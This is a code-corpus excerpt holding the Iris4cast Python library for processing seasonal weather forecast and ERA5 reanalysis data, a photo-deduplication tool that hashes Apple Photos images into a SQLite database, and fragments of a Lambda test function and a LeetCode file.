'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Credentials': True,
},
"body": "Something went wrong"
}
return response
# -------- Test Function --------
def followsMyFollowersTest(event, context):
source_user = "AlanaDLevin"
target_user = "nishitaARK"
return followsMyFollowersHelper(source_user, target_user)
``` |
{
"source": "joshdorrington/Iris4cast",
"score": 3
} |
#### File: joshdorrington/Iris4cast/Iris4cast.py
```python
import iris
import copy as cp
import datetime as dt
import iris.coord_categorisation as iccat
from iris.analysis.cartography import cosine_latitude_weights
import numpy as np
import cf_units
import os
class Dataset:
def __init__(self,field,dates,leads=None):
"""
Dataset is the base class shared by all analysis and forecast data sets. It defines
all functions that are generic between datasets. Not normally used directly.
Args:
* field - A string used to identify which fields to load from file.
*date - a list or tuple of 2 datetime.datetime objects specifying the
first and last datetime to include in the data
*leads - used by the Forecast class only, a list or tuple of 2 floats,
specifying minimum and maximum lead times in days to include.
"""
self.field=field
self.dates=dates
self._d_l,self._d_u=dates
self.leads=leads
#Only data of the same forecast hour is currently supported.
assert dates[0].hour==dates[1].hour
self.hour=[dates[0].hour]
#Name of the primary time coordinate
self.T="time"
#The expected position of the primary time coordinate in the cube
self.t=0
#The day of year associated with 'dates'
self.calendar_bounds=[d.timetuple().tm_yday for d in dates]
self.type=Dataset
#A dictionary that can contain any number of iris CubeLists, each
#labelled with a keyword. The load_data method generates a "data" and
#a "clim" CubeList
self.data={}
#Used by the get_climatology method
self.dist_means=None
self.distribution=None
#The time unit to use
self.U=cf_units.Unit(f"Days since {cf_units.EPOCH}",\
calendar=cf_units.CALENDAR_GREGORIAN)
#Constraints applied to the data at different points.
self.constraints={
#keep only data with a valid time coordinate
"load":iris.Constraint(cube_func=lambda cube: cube.coords(self.T)!=[]),
#keep only data that falls within the calendar_bounds
"calendar":iris.Constraint(coord_values={"day_of_year":lambda cell:\
self._in_calendar_bounds(cell)}),
#keep only data for the right hour
"hour":iris.Constraint(coord_values={"hour":lambda cell:\
np.isin(cell,self.hour)[0]}),
#keep only data that falls within the dates
"data":iris.Constraint(coord_values={self.T:lambda cell:\
self._d_l<=cell<=self._d_u}),
#keep only data that falls outside the dates
"clim":iris.Constraint(coord_values={self.T:lambda cell:\
(self._d_l>cell)or (cell>self._d_u)})
}
self._setup()
def _setup(self):
"""empty method used by derived classes."""
pass
def set_path(self,path):
"""set the path from which to load data"""
if os.path.isdir(path):
self.path=path
else:
raise(ValueError("Not a valid path."))
def copy(self):
"""A method which returns a copy of the Dataset"""
copy=self.type(self.field,self.dates,self.leads)
copy.dist_means=self.dist_means
copy.distribution=self.distribution
copy.data=cp.deepcopy(self.data)
return copy
def add_constraints(self,constr_dict):
"""add a dictionary of constraints 'constr_dict' to the constraints
attribute. Any previously defined keywords will be overwritten."""
for key in constr_dict:
self.constraints[key]=constr_dict[key]
def load_data(self,strict=True):
"""Load data from self.path as a list of iris cubes, preprocess it,
and split it into two CubeLists "data" and "clim".
"""
CL=iris.cube.CubeList()
fs=[self.path+f for f in os.listdir(self.path) if f.endswith(".nc")]
for f in fs:
CL.append(iris.load_cube(f,constraint=self.constraints["load"]))
self.data=CL
self._clean_loaded_data()
a=self.data.extract(self.constraints["data"])
c=self.data.extract(self.constraints["clim"])
if strict:
if a is None: raise(ValueError("No data after applying constraints."))
if c is None: raise(ValueError("No climatology data after applying constraints."))
self.data={"data":a,"clim":c}
def _clean_loaded_data(self):
"""empty method used by derived classes."""
pass
def _in_calendar_bounds(self,x):
"""Evaluates whether a real number x lies between the calendar_bounds
of the dataset, wrapping around the end of the year if necessary."""
c0,c1=self.calendar_bounds
if c1<c0:
ans=(x<=c1) or (x>=c0)
else:
ans=(x<=c1) and (x>=c0)
return ans
def restrict_area(self,region):
"""A convenience method that restricts the spatial extent of the
Dataset to one of a few preset domains, defined by a string "region".
"""
if region.lower()=="europe":
lons=[-15,20]
lats=[32,60]
elif region.lower()=="france":
lons=[-5,8]
lats=[42,51]
elif region.lower()=="north_atlantic":
lons=[-80,40]
lats=[30,90]
else: raise(ValueError(f"Unrecognised region {region}."))
#We use this over intersection, because it works for cubelists
area_constr=iris.Constraint(longitude=lambda x: lons[0]<=x<=lons[1],\
latitude=lambda x: lats[0]<=x<=lats[1])
for key in self.data:
self.data[key]=self.data[key].extract(area_constr)
def add_cat_coord(self,iccat_function,coordname,base_coord):
"""Adds a categorical coordinate to all cubes in Dataset.data, defined
by 'iccat_function' relative to 'base_coord', and called 'coordname'.
Note that the name of the new coord is defined internally by
iccat_function; coordname serves only to graciously handle the case when
that coordinate already exists."""
for key in self.data:
for i,entry in enumerate(self.data[key]):
if entry.coords(coordname)==[]:
iccat_function(entry,base_coord)
def change_units(self,unit_str=None,cf_unit=None):
"""Changes the units of all cubes in the Dataset to a new unit given
either by a valid cf_units.Unit string specifier 'unit_str', or a
cf_units.Unit object, 'cf_unit'."""
if unit_str is not None and cf_unit is not None:
raise(ValueError("Only one unit can be provided."))
elif unit_str is not None:
unit=cf_units.Unit(unit_str)
elif cf_unit is not None:
unit=cf_unit
else: raise(ValueError("A unit must be provided."))
for key in self.data:
for i,entry in enumerate(self.data[key]):
entry.convert_units(unit)
def change_dates(self,newdates):
"""
Redefines the 'dates' attribute to the list of 2 datetimes 'newdates',
reapplying the "data" and "clim" constraints to match
**currently quite slow for large cubelists**
"""
self.dates=newdates
self._d_l,self._d_u=self.dates
self.calendar_bounds=[d.timetuple().tm_yday for d in self.dates]
CL_data=iris.cube.CubeList()
CL_clim=iris.cube.CubeList()
for key in self.data:
a=self.data[key].extract(self.constraints["data"])
if a != []:
CL_data.append(a)
a=self.data[key].extract(self.constraints["clim"])
if a != []:
CL_clim.append(a)
CL_data=iris.cube.CubeList([c for C in CL_data for c in C])
CL_clim=iris.cube.CubeList([c for C in CL_clim for c in C])
self.data["data"]=CL_data.concatenate()
self.data["clim"]=CL_clim.concatenate()
def change_calendar(self,newcalendar):
for key in self.data:
for i,entry in enumerate(self.data[key]):
newunit=cf_units.Unit(\
entry.coord("time").units.origin,calendar=newcalendar)
self.data[key][i].coord("time").unit=newunit
def aggregate_by(self,coords,bins,aggregator=iris.analysis.MEAN):
"""Aggregates the coordinates of all cubes in Dataset into user defined
bins.
Args:
*coords - A list of strings which are the coordinates
to be aggregated over.
*bins - A corresponding list of lists 'bins'. bins[i]
should contain the bounding values over which to group coords[i].
Kwargs:
*aggregator -A valid iris.analysis.Aggregator object which specifies
how to aggregate entries together.
"""
binlabels=[]
for j,coord in enumerate(coords):
binlabels.append(f"bin{j}")
for key in self.data:
for i,entry in enumerate(self.data[key]):
for j,(coord,b) in enumerate(zip(coords,bins)):
#remove potential old bins:
if self.data[key][i].coords(f"bin{j}")!=[]:
self.data[key][i].remove_coord(f"bin{j}")
if self.data[key][i].coords(coord)==[]:
raise(ValueError("No such coordinate in cube!"))
label=np.digitize(entry.coord(coord).points,b)
coord_dim=entry.coord_dims(entry.coord(coord))
entry.add_aux_coord(iris.coords.AuxCoord(label,\
var_name=f"bin{j}"),data_dims=coord_dim)
self.data[key][i]=entry.aggregated_by(binlabels,aggregator)
for j,coord in enumerate(coords):
if self.data[key][i].coords(coord)!=[]:
self.data[key][i].remove_coord(f"bin{j}")
def collapse_over(self,coord,aggregator=iris.analysis.MEAN):
"""Collapses all cubes in Dataset over a single coordinate.
Args:
*coords - A string which is the coordinate to collapse.
Kwargs:
*aggregator -A valid iris.analysis.Aggregator object which specifies
how to collapse the coordinate.
"""
for key in self.data:
for i,entry in enumerate(self.data[key]):
self.data[key][i]=self.data[key][i].collapsed(coord,aggregator)
def apply_coslat_mean(self,mask=None):
"""Collapses the latitude and longitude coordinates of all cubes in
Dataset, using a cosine latitude weighting.
Kwargs:
*mask:
A cube with matching latitude and longitude coordinates to
the cubes in Dataset. Each gridpoint in 'mask' should vary between
0 (totally masked) to 1 (totally unmasked).
"""
for key in self.data:
for i,entry in enumerate(self.data[key]):
weights = cosine_latitude_weights(entry)
#include the land sea mask in the weighting if one was passed.
if mask is not None:
weights=weights*mask.data
self.data[key][i]=entry.collapsed(["latitude","longitude"],\
iris.analysis.MEAN,weights=weights)
def regrid_to(self,dataset=None,cube=None,regridder=iris.analysis.Linear()):
"""regrids every cube in Dataset to match either those of another
Dataset object, or an iris.Cube object."""
if cube is None and dataset is None:
raise(ValueError("No reference for regridding provided!"))
elif cube is None:
ref_cube=dataset.data["data"][0]
else:
ref_cube=cube
for key in self.data:
for i,entry in enumerate(self.data[key]):
self.data[key][i]=entry.regrid(ref_cube,regridder)
def apply(self,func,*args,in_place=True,keys=None,**kwargs):
"""A method which applies a function to every cube in Dataset
Args:
*func - A function of the type func(cube,*args,**kwargs).
Kwargs:
in_place - A boolean, specifying whether func returns an output or
not. If True, cube is set equal to func(cube), unless the output
is None, in which case cube is removed from the CubeList.
"""
if keys is None:
keys=self.data
for key in keys:
for i,entry in enumerate(self.data[key]):
result=func(entry,*args,**kwargs)
if in_place:
pass
else:
if result is not None:
self.data[key][i]=result
else:
self.data[key].remove(self.data[key][i])
def apply_constraint(self,constraint,keys=None):
"""Apply a constraint to all cubes in Dataset"""
if keys is None:
keys=self.data
for key in keys:
self.data[key]=self.data[key].extract(constraint)
def get_climatology(self,percentiles):
"""Finds the distribution of all values in the Dataset.
Args:
* percentiles - A numpy array ([p_1,...,p_N]) where 0<=p_i<=100,
which defines the percentiles of the data distribution to calculate.
"""
self.percentiles=percentiles
lat,lon=self.data["clim"][0].shape[-2:]
dist=np.zeros([1,lat,lon])
#We call the whole cubelist into memory
self.data["clim"].realise_data()
dist=np.concatenate([f.data.reshape([-1,lat,lon]) for f in self.data["clim"]])
self.distribution=np.percentile(dist,percentiles,axis=0)
self.distribution[0]-=0.01
means=np.zeros([len(percentiles)-1,lat,lon])
for i in range(len(percentiles)-1):
for j in range(lat):
for k in range(lon):
means[i,j,k]=dist[np.digitize(dist[:,j,k],\
self.distribution[:,j,k],right=True)==i+1,j,k].mean()
#interpolates empty bins as being halfway between the distribution bounds
for i,j,k in np.argwhere(np.isnan(means)):
means[i,j,k]=self.distribution[i:i+2,j,k].mean()
self.dist_means=means
def get_seasonal_cycle(self,N=4,period=365.25,keys=None):
"""Fits N sine modes to the data series, with frequencies of n/(365.25 days)
for n in [1,...,N], in order to calculate a smooth seasonal cycle.
Kwargs:
*keys - A list of keys to self.data, specifying which data to use
to calculate the cycle. If keys is None, all data in the dataset
will be used.
"""
#Default is to include all data
if keys is None: keys = [key for key in self.data]
self.deseasonaliser=_Deseasonaliser(self.data,keys,N,period)
self.deseasonaliser.fit_cycle()
def remove_seasonal_cycle(self,deseasonaliser=None,strict_t_ax=False):
if deseasonaliser is None:
if self.deseasonaliser is None:
raise(ValueError("No _Deseasonaliser object found."))
else:
deseasonaliser=self.deseasonaliser
if deseasonaliser.coeffs is None:
deseasonaliser.fit_cycle()
for key in self.data:
for i,cube in enumerate(self.data[key]):
cycle=deseasonaliser.evaluate_cycle(cube.coord("time"),strict=strict_t_ax)
if cycle.shape!=cube.shape:
dim_map=[cube.coord_dims(coord)[0] for coord in \
["time","latitude","longitude"]]
cycle=iris.util.broadcast_to_shape(cycle,cube.shape,dim_map)
self.data[key][i].data=cube.data-cycle
def set_time_axis_first(self,tname="time"):
for key in self.data:
for entry in self.data[key]:
t_ax=entry.coord_dims(tname)[0]
if t_ax!=0:
ax=np.arange(entry.ndim)
entry.transpose([t_ax,*ax[ax!=t_ax]])
class _Deseasonaliser:
def __init__(self,data,keys,N,period=365.25,coeffs=None):
self.raw_data=[]
self.t=[]
self.t_unit=None
self.tref=None
self.keys=keys
self.N=N
self.pnum=2*(N+1)
self.period=period
self.coeffs=None
for key in keys:
for cube in data[key]:
self.raw_data.append(cube.data)
if self.t_unit is not None:
if self.t_unit!=cube.coord("time").units:
raise(ValueError("Clashing time units in data."))
else:
self.t_unit=cube.coord("time").units
self.t.append(cube.coord("time").points)
i=cube.coord_dims("time")[0]
self.raw_data=np.concatenate(self.raw_data,axis=i)
self.t=np.concatenate(self.t,axis=i)
self._setup_data()
self.lat,self.lon=self.raw_data.shape[1:]
def _setup_data(self):
self.raw_data=self.raw_data[np.argsort(self.t)]
self.t.sort()
self.tref=self.t[0]
self.t=(self.t-self.tref)%self.period
#intelligently guesses initial parameters
def _guess_p(self,tstd):
p=np.zeros(self.pnum)
for i in range(0,self.N):
p[2+2*i]=tstd/(i+1.0)
return p
def _change_calendar(self,new_calendar):
self.t_unit=cf_units.Unit(self.t_unit.origin,calendar=new_calendar)
#defines multimode sine function for fitting
def _evaluate_fit(self,x,p,N):
ans=p[0]*x+p[1]
for i in range(0,N):
ans+=p[2*i+2] * np.sin(2 * np.pi * (i+1)/365.25 * x + p[2*i+3])
return ans
#defines error function for optimisation
def _get_residual(self,p,y,x,N):
return y - self._evaluate_fit(x,p,N)
def fit_cycle(self):
from scipy.optimize import leastsq
fit_coeffs=np.zeros([self.pnum,self.lat,self.lon])
for i in range(self.lat):
for j in range(self.lon):
griddata=self.raw_data[:,i,j]
tstd=griddata.std()
p0=self._guess_p(tstd)
plsq=leastsq(self._get_residual,p0,args=(griddata,self.t,self.N))
fit_coeffs[:,i,j]=plsq[0]
self.coeffs=fit_coeffs
def evaluate_cycle(self,t,strict=False):
t=t.copy()
if self.coeffs is None:
raise(ValueError("No coefficients for fitting have been calculated yet."))
if t.units!=self.t_unit:
if t.units.is_convertible(self.t_unit):
t.convert_units(self.t_unit)
elif (t.units.origin==self.t_unit.origin) and (not strict):
t.units=cf_units.Unit(t.units.origin,calendar=self.t_unit.calendar)
else:
raise(ValueError("Units of time series to evaluate are \
incompatible with units of fitted time series."))
t=t.points
t=(t-self.tref)%self.period
cycle=np.zeros([len(t),self.lat,self.lon])
for i in range(self.lat):
for j in range(self.lon):
cycle[:,i,j]=self._evaluate_fit(t,self.coeffs[:,i,j],self.N)
return cycle
"""Analysis is a subclass of Dataset that deals with reanalysis. At the moment
specific to era5, but that should be changed if more analyses start being used."""
class Analysis(Dataset):
def _setup(self):
self.path="/mnt/seasonal/reanalysis/era5/"+self.field+"/"
self.type=Analysis
def _clean_loaded_data(self):
for i in range(len(self.data)):
self.data[i].metadata.attributes.clear()
self.data[i].coord("latitude").points=\
self.data[i].coord("latitude").points.astype(np.float32)
self.data[i].coord("longitude").points=\
self.data[i].coord("longitude").points.astype(np.float32)
self.data=self.data.concatenate_cube()
try:
self.data.coord(self.T).convert_units(self.U)
except:
print(f"Warning: could not convert {self.T} to {self.U}, simply renaming calendar.")
new_T=cf_units.Unit(self.data.coord(self.T).units.origin,self.U.calendar)
self.data.coord(self.T).units=new_T
try:
self.data.coord(self.T).convert_units(self.U)
except:
raise(ValueError("Unsuccesful attempt to change time units."))
iccat.add_hour(self.data,self.T)
self.data=self.data.extract(self.constraints["hour"])
iccat.add_day_of_year(self.data,self.T)
self.data=self.data.extract(self.constraints["calendar"])
self.data=iris.cube.CubeList([self.data])
class Forecast(Dataset):
def _setup(self):
self.T="forecast_reference_time"
self.S="forecast_period"
self.R="realisation"
self._l_l,self._l_u=self.leads
self.type=Forecast
self.t=1
self._fsetup()
self.constraints["lead"]=iris.Constraint(coord_values={self.S:\
lambda cell:(self._l_l<=cell)and (cell<=self._l_u)})
self.constraints["ens"]=iris.Constraint(coord_values={self.R:\
lambda cell: cell.point<self.max_ens})
#Used by derived classes
def _fsetup(self):
pass
def get_quantile_correction(self,analysis):
if self.dist_means is None:
raise(ValueError("Must get forecast climatology first."))
if analysis.dist_means is None:
raise(ValueError("Must get analysis climatology first."))
if not np.all(analysis.percentiles == self.percentiles):
raise(ValueError("These datasets have incomparable climatologies."))
self.quantile_correction=analysis.dist_means-self.dist_means
def apply_quantile_correction(self):
lat,lon=self.data["data"][0].shape[-2:]
for i,entry in enumerate(self.data["data"]):
shape=entry.data.shape
data=entry.data.reshape([-1,lat,lon])
for x in range(lat):
for y in range(lon):
which_bin=np.digitize(data[:,x,y],self.distribution[:,x,y],right=True)
which_bin[which_bin==0]+=1 #cold outliers put in 0-5% bin
which_bin[which_bin==len(self.percentiles)]-=1 #warm outliers in 95-100% bin
which_bin-=1 #indexing from zero
correction=self.quantile_correction[:,x,y][which_bin]
data[:,x,y]+=correction
data=data.reshape(shape)
self.data["data"][i].data=data
self.data["data"][i].long_name="corrected "+self.data["data"][i].name()
class SubxForecast(Forecast):
def _fsetup(self):
self.path="/mnt/seasonal/subx/"+self.field+"/"
self.R="realization"
self.max_ens=11
self.type=SubxForecast
def _clean_loaded_data(self):
CL=iris.cube.CubeList()
for i,cube in enumerate(self.data):
for entry in cube.slices_over(self.T):
entry.coord(self.T).convert_units(self.U)
T_ref=entry.coord(self.T)
S=entry.coord(self.S).points
t_coord=iris.coords.AuxCoord(S+T_ref.points[0],standard_name="time")
t_coord.units=T_ref.units
entry.add_aux_coord(t_coord,data_dims=1)
iccat.add_hour(entry,"time")
iccat.add_day_of_year(entry,"time")
CL.append(entry)
CL.sort(key=lambda cube:cube.coord(self.T).points[0])
self.data=CL
self.data=self.data.extract(self.constraints["calendar"])
self.data=self.data.extract(self.constraints["lead"])
self.data=self.data.extract(self.constraints["hour"])
self.data=self.data.extract(self.constraints["ens"])
def remove_masked(self):
for key in self.data:
self.data[key].realise_data()
masked=[]
for entry in self.data[key]:
if not np.all(entry.data.mask==False):
masked.append(entry)
for entry in masked:
self.data[key].remove(entry)
class EC45Forecast(Forecast):
def _fsetup(self):
self.path="/mnt/seasonal/ec45/netcdf/"+self.field+"/"
self.max_ens=11
self.U=cf_units.Unit(f"Days since {cf_units.EPOCH}",\
calendar=cf_units.CALENDAR_PROLEPTIC_GREGORIAN)
self.type=EC45Forecast
def _clean_loaded_data(self):
CL=iris.cube.CubeList()
for i,cube in enumerate(self.data):
for entry in cube.slices_over(self.T):
entry.coord(self.T).convert_units(self.U)
entry.coord(self.S).convert_units(cf_units.Unit("Days"))
T_ref=entry.coord(self.T)
S=entry.coord(self.S).points
t_coord=iris.coords.AuxCoord(S+T_ref.points[0],standard_name="time")
t_coord.units=T_ref.units
entry.add_aux_coord(t_coord,data_dims=1)
iccat.add_hour(entry,"time")
iccat.add_day_of_year(entry,"time")
CL.append(entry)
CL.sort(key=lambda cube:cube.coord(self.T).points[0])
self.data=CL
self.data=self.data.extract(self.constraints["calendar"])
self.data=self.data.extract(self.constraints["lead"])
self.data=self.data.extract(self.constraints["hour"])
self.data=self.data.extract(self.constraints["ens"])
class Seas5Forecast(Forecast):
def _fsetup(self):
self.path="/mnt/seasonal/seas5/"+self.field+"/"
self.max_ens=25
self.R="realization"
self.U=cf_units.Unit(f"Days since {cf_units.EPOCH}",\
calendar=cf_units.CALENDAR_PROLEPTIC_GREGORIAN)
self.type=Seas5Forecast
def _clean_loaded_data(self):
CL=iris.cube.CubeList()
for i,cube in enumerate(self.data):
for entry in cube.slices_over(self.T):
entry.coord(self.T).convert_units(self.U)
entry.coord(self.S).convert_units(cf_units.Unit("Days"))
T_ref=entry.coord(self.T)
S=entry.coord(self.S).points
t_coord=iris.coords.AuxCoord(S+T_ref.points[0],standard_name="time")
t_coord.units=T_ref.units
entry.add_aux_coord(t_coord,data_dims=1)
iccat.add_hour(entry,"time")
iccat.add_day_of_year(entry,"time")
CL.append(entry)
CL.sort(key=lambda cube:cube.coord(self.T).points[0])
self.data=CL
self.data=self.data.extract(self.constraints["calendar"])
self.data=self.data.extract(self.constraints["lead"])
self.data=self.data.extract(self.constraints["hour"])
self.data=self.data.extract(self.constraints["ens"])
"""An example script:
Here we want to look at week 3 forecasts around second week of June 2003.
We use a 21 day window, including the first and third weeks. We want
weekly mean temperatures averaged over France, for the EC45, SUBX and SEAS5
forecast systems. We also want to debias our forecasts, using a climatology
of past dates.
"""
#All bounds are inclusive.
#3 week period centred around 11/6/2003
dates=[dt.datetime(2003,6,1,12),dt.datetime(2006,6,21,12)]
leads=[14.5,20.5] #Week 3, in days. We want midday, so we add .5
run=False
if run:
#Load and restrict to the region around France
import time
t0=time.time()
A=Analysis("T2m",dates)
A.load_data()
A.restrict_area("France")
Fx=SubxForecast("T2m",dates,leads)
Fx.load_data()
Fx.restrict_area("France")
Fec=EC45Forecast("2T",dates,leads)
Fec.load_data()
Fec.restrict_area("France")
Fs=Seas5Forecast("T2m",dates,leads)
Fs.load_data()
Fs.restrict_area("France")
t1=time.time()
print(f"loaded data (t={t1-t0:.1f}).")
#Fx has the lowest spatial resolution
A.regrid_to(Fx)
Fec.regrid_to(Fx)
Fs.regrid_to(Fx)
t2=time.time()
print(f"regridded data (t={t2-t1:.1f}).")
#Backups of the uncorrected forecasts so we dont have to reload.
Fx_bkp=Fx.copy()
Fs_bkp=Fs.copy()
Fec_bkp=Fec.copy()
#Compute 5% bins for climatology calculations
#We want our climatology to be computed for daily, gridpoint values:
percentiles=np.linspace(0,100,21)
A.get_climatology(percentiles)
Fx.get_climatology(percentiles)
Fs.get_climatology(percentiles)
Fec.get_climatology(percentiles)
Fx.get_quantile_correction(A)
Fs.get_quantile_correction(A)
Fec.get_quantile_correction(A)
t3=time.time()
print(f"computed corrections (t={t3-t2:.1f}).")
Fx.apply_quantile_correction()
Fs.apply_quantile_correction()
Fec.apply_quantile_correction()
t4=time.time()
print(f"applied corrections (t={t4-t3:.1f}).")
#After error correcting we want to take weekly means. We exclude any
#forecasts that aren't 7 days long:
full_week=iris.Constraint(cube_func=lambda cube: cube.coord("forecast_period").shape[0]==7)
Fx.apply_constraint(full_week)
Fs.apply_constraint(full_week)
Fec.apply_constraint(full_week)
#We then collapse the time axis to get weekly means:
A.apply(lambda cube: cube.collapsed(A.T,iris.analysis.MEAN))
Fx.apply(lambda cube: cube.collapsed(Fx.S,iris.analysis.MEAN))
Fs.apply(lambda cube: cube.collapsed(Fs.S,iris.analysis.MEAN))
Fec.apply(lambda cube: cube.collapsed(Fec.S,iris.analysis.MEAN))
#We load the land/sea mask and apply the area reduction:
MASK_PATH="/mnt/seasonal/land_sea_mask/NAVO_lsmask_1deg.nc"
sea_mask=iris.load_cube(MASK_PATH)
sea_mask=sea_mask.regrid(Fx.data["data"][0],iris.analysis.Linear())
A_reduced=A.copy().apply_coslat_mean(mask=sea_mask)
Fx.apply_coslat_mean(mask=sea_mask)
Fs.apply_coslat_mean(mask=sea_mask)
Fec.apply_coslat_mean(mask=sea_mask)
t5=time.time()
print(f"collapsed lat and lon (t={t5-t4:.1f}).")
print("finished!")
``` |
{
"source": "josh-dot-com/photo-deduplication",
"score": 3
} |
#### File: photo-deduplication/src/hasher.py
```python
from PIL import Image
from imagededup.methods import PHash, AHash, DHash, WHash
from imagehash import average_hash, phash, dhash, whash, colorhash, crop_resistant_hash
class Hasher:
IMAGEDEDUP_HASHER_LIST = [PHash, AHash, DHash, WHash]
IMAGEDEDUP_HASHERS = { h.__name__.lower(): h() for h in IMAGEDEDUP_HASHER_LIST }
IMAGEHASH_FUNCTION_LIST = [average_hash, phash, dhash, whash, colorhash, crop_resistant_hash]
IMAGEHASH_FUNCTIONS = { f.__name__.lower(): f for f in IMAGEHASH_FUNCTION_LIST }
def __init__(self):
self.hashers = self.__class__.IMAGEDEDUP_HASHERS
self.hash_funcs = self.__class__.IMAGEHASH_FUNCTIONS
def imagededup_encode(self, photos):
encodings = {}
for photo in photos:
hashes = {}
for name, hasher in self.hashers.items():
hashes[name] = hasher.encode_image(image_file=photo.abspath())
encodings[photo.id] = hashes
return encodings
def imagehash_encode(self, photos):
encodings = {}
for photo in photos:
pil_photo = Image.open(photo.abspath())
encodings[photo.id] = {name: str(func(pil_photo)) for name, func in self.hash_funcs.items()}
return encodings
def encode_video(self, videos):
# TODO process video poritons of live photos
# https://stackoverflow.com/questions/9896644/getting-ffprobe-information-with-python
pass
def find_duplicates(self, photos):
return { n: self.__find_duplicates_with_hasher(n, h, photos) for n, h in self.hashers.items() }
def __find_duplicates_with_hasher(self, hasher_name, hasher, photos):
encoding_map = { photo.abspath(): photo.hashes[hasher_name] for photo in photos }
duplicates = hasher.find_duplicates(encoding_map=encoding_map, scores=True)
return duplicates
```
#### File: photo-deduplication/src/main.py
```python
import os
import logging
from argparse import ArgumentParser
from sqlalchemy import or_
import osxphotos
from hasher import Hasher
from db import \
LibraryType, Library, Photo, Duplicate, HashLibrary, HashAlgoritm, Encoding, \
get_hash_algo, fetch_or_initialize_db
DATABASE_DEFAULT_PATH = "assets/duplicates.db"
SUPPORTED_IMAGE_FORMATS = set(
['JPEG', 'PNG', 'BMP', 'MPO', 'PPM', 'TIFF', 'GIF', 'SVG', 'PGM', 'PBM']
)
def parse_args():
parser = ArgumentParser(description='Deduplicate photo albums')
parser.add_argument('-d', '--db_path',
type=str,#check_path_existence("database file"),
action='store',
default=DATABASE_DEFAULT_PATH,
help=f"database file path where results persist (defaults to {DATABASE_DEFAULT_PATH})")
parser.add_argument('paths',
metavar='path',
type=check_path_existence('photo library path'),
nargs='*',
action='extend',
help="path to .photoslibrary or photo directory")
parser.add_argument('-v', '--verbose',
action='store_true',
help="verbose logging")
parser.add_argument('--dry-run',
action='store_true',
help="do not write or encode. list what operations would be performed")
return parser.parse_args()
def check_path_existence(arg_name):
def check_name(path):
abspath = os.path.abspath(os.path.expanduser(path))
if not os.path.exists(abspath):
logging.error(f"{arg_name} does not exist: {path}")
exit(55)
return abspath
return check_name
def fetch_libraries(paths, db):
# TODO @j000shDotCom separate directories from apple photos
return [fetch_or_initialize_library(path, db) for path in paths], []
def fetch_or_initialize_library(library_path, db):
library_name = os.path.basename(library_path)
conditions = or_(Library.path == library_path, Library.name == library_name)
library = db.query(Library).filter(conditions).first()
if not library:
logging.info(f"Creating Library: ${library_name}")
library = Library(name=library_name, path=library_path, type=LibraryType.apple_photos)
db.add(library)
db.commit()
return library
def fetch_photos(library):
photosdb = osxphotos.PhotosDB(library.path)
images = photosdb.photos(images=True, movies=False)
videos = [] # photosdb.photos(images=False, movies=True)
albums = {} # photosdb.albums_as_dict
photos = [ Photo(p, library) for p in filter(is_image_supported, images) ]
logging.info(f"Found {len(photos)} photos, {len(videos)} videos, {len(albums)} albums")
return (photos, videos, albums)
def is_image_supported(photo):
file_extension = os.path.splitext(photo.path)[1]
return file_extension[1:].upper() in SUPPORTED_IMAGE_FORMATS
def persist_photos(photos, db):
logging.info(f"INSERTING {len(photos)} NEW PHOTOS")
db.add_all(photos)
db.commit()
# TODO fix the re-insertion of photos
# conditions = Photo.uuid.in_([p.uuid for p in photos])
# db_photos = { p[0] for p in db.query(Photo.uuid).filter(conditions).all() }
# new_photos = [ p for p in photos if p.uuid not in db_photos ]
# if new_photos:
# logging.info(f"INSERTING {len(photos)} NEW PHOTOS")
# db.add_all(photos)
# db.commit()
def persist_duplicates(library, duplicates, encodings, db):
logging.info("Persisting duplicates")
# get fresh photo data from the database
photos = db.query(Photo).filter_by(library_id=library.id).all()
dupes = db.query(Duplicate).filter_by(library_id=library.id).all()
id_photos = { p.id: p for p in photos }
keyed_photos = { p.abspath(): p for p in photos }
org = {}
for d in dupes:
temp = org[d.hash_name] if d.hash_name in org else {}
org[d.hash_name] = temp
op = id_photos[d.orig_photo_id]
op_path = op.abspath()
dp = id_photos[d.dup_photo_id]
temp = org[d.hash_name][op_path] if op_path in org[d.hash_name].keys() else set()
org[d.hash_name][op_path] = temp
org[d.hash_name][op_path].add(dp.abspath())
db_duplicates = []
for hash_name, photos in duplicates.items():
for orig_photo_path, photo_duplicates in photos.items():
existingpaths = org[hash_name][orig_photo_path] if org and org[hash_name] and orig_photo_path in org[hash_name] else set()
for dup_photo_path, score in photo_duplicates:
if dup_photo_path in existingpaths:
continue
dupe = Duplicate(
library_id=library.id,
orig_photo_id=keyed_photos[orig_photo_path].id,
dup_photo_id=keyed_photos[dup_photo_path].id,
hash_name=hash_name,
hash_value=keyed_photos[orig_photo_path].hashes[hash_name],
score=score
)
db_duplicates.append(dupe)
if db_duplicates:
logging.info(f"INSERTING {len(db_duplicates)} NEW DUPLICATES")
db.add_all(db_duplicates)
db.commit()
def main():
args = parse_args()
library_paths = args.paths
if not library_paths:
logging.error('no libraries specified')
last_library_path = osxphotos.utils.get_last_library_path()
system_library_path = osxphotos.utils.get_system_library_path()
resp = input(f"use last .photoslibrary ({last_library_path}) [Y/n] ")
if not resp or resp.lower() == 'y':
library_paths.append(last_library_path)
else:
exit(2)
db_session = fetch_or_initialize_db(args.db_path)
applephotos, directories = fetch_libraries(library_paths, db_session)
photos, videos, albums = fetch_photos(applephotos[0]) # TODO
# TODO replace these dry-run guards with decorators
if args.dry_run:
logging.info('[dry-run] skipping photo persistence')
else:
logging.info('Persisting photo data')
persist_photos(photos, db_session)
hasher = Hasher()
if args.dry_run:
logging.info('[dry-run] skipping image encoding')
else:
logging.info("Encoding images with imagededup")
imagededup_encodings = hasher.imagededup_encode(photos)
logging.info("Encoding images with imagehash")
imagehash_encodings = hasher.imagehash_encode(photos)
logging.info('Persisting photo encodings')
encodings = []
for photo in photos:
photo_id = photo.id
for hash_name, value in imagededup_encodings[photo_id].items():
enc = Encoding(photo_id=photo_id, hash_library=HashLibrary.imagededup, \
algorithm=get_hash_algo(hash_name), value=value)
encodings.append(enc)
for hash_name, value in imagehash_encodings[photo_id].items():
enc = Encoding(photo_id=photo_id, hash_library=HashLibrary.imagehash, \
algorithm=get_hash_algo(hash_name), value=value)
encodings.append(enc)
db_session.add_all(encodings)
db_session.commit()
if args.dry_run:
logging.info('[dry-run] skipping deduplication check and persistence')
else:
pass
# TODO make this smarter AND ASYNC
# logging.info("Deduplicating images")
# duplicates = hasher.find_duplicates(photos)
# persist_duplicates(library, duplicates, encodings, db_session)
if __name__ == "__main__":
main()
``` |
{
"source": "josh-dp/LeetCode-Solutions",
"score": 4
} |
#### File: LeetCode-Solutions/Python/1277. CountSquareSubmatricesWithAllOnes.py
```python
